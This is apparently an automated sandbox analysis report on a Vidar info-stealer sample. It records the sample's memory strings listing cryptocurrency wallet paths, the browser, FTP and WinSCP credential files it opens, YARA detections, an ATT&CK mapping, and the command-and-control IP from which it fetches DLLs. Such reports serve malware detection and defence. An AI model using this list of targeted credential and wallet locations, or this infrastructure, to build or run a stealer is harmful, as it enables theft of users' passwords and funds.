Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5832, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.4315570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.4315570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5832, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CE10C40 sqlite3_bind_zeroblob,	4_2_6CE10C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CE10D60 sqlite3_bind_parameter_name,	4_2_6CE10D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD38EA0 sqlite3_clear_bindings,	4_2_6CD38EA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	511 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	54 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://mozilla.org0/	0%	URL Reputation	safe
https://78.46.229.36/msvcp140.dllh	0%	Avira URL Cloud	safe
https://78.46.229.36/mozglue.dllZ	0%	Avira URL Cloud	safe
https://78.46.229.36/	0%	Avira URL Cloud	safe
https://78.46.229.36/Bi	0%	Avira URL Cloud	safe
https://78.46.229.36/ramData	0%	Avira URL Cloud	safe
https://78.46.229.36/sqlm.dllf	0%	Avira URL Cloud	safe
https://78.46.229.36/msvcp140.dll	0%	Avira URL Cloud	safe
https://78.46.229.36/freebl3.dll	0%	Avira URL Cloud	safe
https://78.46.229.36/softokn3.dll	0%	Avira URL Cloud	safe
https://78.46.229.36/mozglue.dll	0%	Avira URL Cloud	safe
https://78.46.229.36DBKJJ	0%	Avira URL Cloud	safe
https://78.46.229.36/s	0%	Avira URL Cloud	safe
https://78.46.229.36/f	0%	Avira URL Cloud	safe
https://78.46.229.36/vcruntime140.dll	0%	Avira URL Cloud	safe
https://78.46.229.36/nss3.dll	0%	Avira URL Cloud	safe
https://78.46.229.36/softokn3.dllr	0%	Avira URL Cloud	safe
https://78.46.229.36/sqlm.dll	0%	Avira URL Cloud	safe
https://78.46.229.36	0%	Avira URL Cloud	safe
https://78.46.229.36/te5	0%	Avira URL Cloud	safe
https://78.46.229.36/6	0%	Avira URL Cloud	safe
https://78.46.229.36/0	0%	Avira URL Cloud	safe
https://78.46.229.36HJEBK	0%	Avira URL Cloud	safe
https://78.46.229.36/freebl3.dll6	0%	Avira URL Cloud	safe
https://78.46.229.36/D	0%	Avira URL Cloud	safe
https://78.46.229.36/Z0t	0%	Avira URL Cloud	safe
https://78.46.229.36/$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	104.105.90.131	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://78.46.229.36/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/nss3.dll	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/sqlm.dll	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199658817715	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	GCAFCAFH.4.dr	false		high
https://duckduckgo.com/ac/?q=	GCAFCAFH.4.dr	false		high
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=GRA9	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/Bi	RegAsm.exe, 00000004.00000002.2403578458.000000000149C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/msvcp140.dllh	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/profiles/76561199658817715/badges	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/mozglue.dllZ	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/sqlm.dllf	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
http://www.mozilla.com/en-US/blocklist/	RegAsm.exe, RegAsm.exe, 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr	false		high
https://mozilla.org0/	mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	GCAFCAFH.4.dr	false		high
https://78.46.229.36/ramData	RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://www.ecosia.org/newtab/	GCAFCAFH.4.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	false		high
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36	76561199658817715[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/s	RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/softokn3.dllr	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=yp9unEzrjc_Z&amp	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
